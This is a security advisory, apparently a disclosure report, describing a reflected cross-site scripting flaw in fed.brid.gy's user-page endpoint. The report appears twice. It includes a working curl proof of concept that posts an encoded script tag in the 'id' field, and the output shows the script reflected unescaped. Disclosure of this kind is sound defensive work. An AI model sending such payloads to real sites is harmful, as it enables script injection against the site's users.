Summary
fed.brid.gy's search is vulnerable to XSS.
Details
It looks like the fed.brid.gy code implicitly trusts the value of 'id' in several places and includes in as part of rendering responses:
https://github.com/search?q=repo%3Asnarfed%2Fbridgy-fed%20Couldn%27t%20determine%20network&type=code
PoC
$ curl 'https://fed.brid.gy/user-page' --data-raw 'id=%3Cscript%3Ealert%281%29%3C%2Fscript%3E' | grep alert
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3052 100 3010 100 42 9477 132 --:--:-- --:--:-- --:--:-- 9627
Couldn't determine network for <script>alert(1)</script>.
Impact
Getting someone to click on a link which results in a malicious POST to https://fed.brid.gy/user-page will result in JavaScript being executed in the context of fed.brid.gy.
timb-machine Reporter
Summary
fed.brid.gy's search is vulnerable to XSS.
Details
It looks like the fed.brid.gy code implicitly trusts the value of 'id' in several places and includes in as part of rendering responses:
https://github.com/search?q=repo%3Asnarfed%2Fbridgy-fed%20Couldn%27t%20determine%20network&type=code
PoC
$ curl 'https://fed.brid.gy/user-page' --data-raw 'id=%3Cscript%3Ealert%281%29%3C%2Fscript%3E' | grep alert
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3052 100 3010 100 42 9477 132 --:--:-- --:--:-- --:--:-- 9627
Impact
Getting someone to click on a link which results in a malicious POST to https://fed.brid.gy/user-page will result in JavaScript being executed in the context of fed.brid.gy.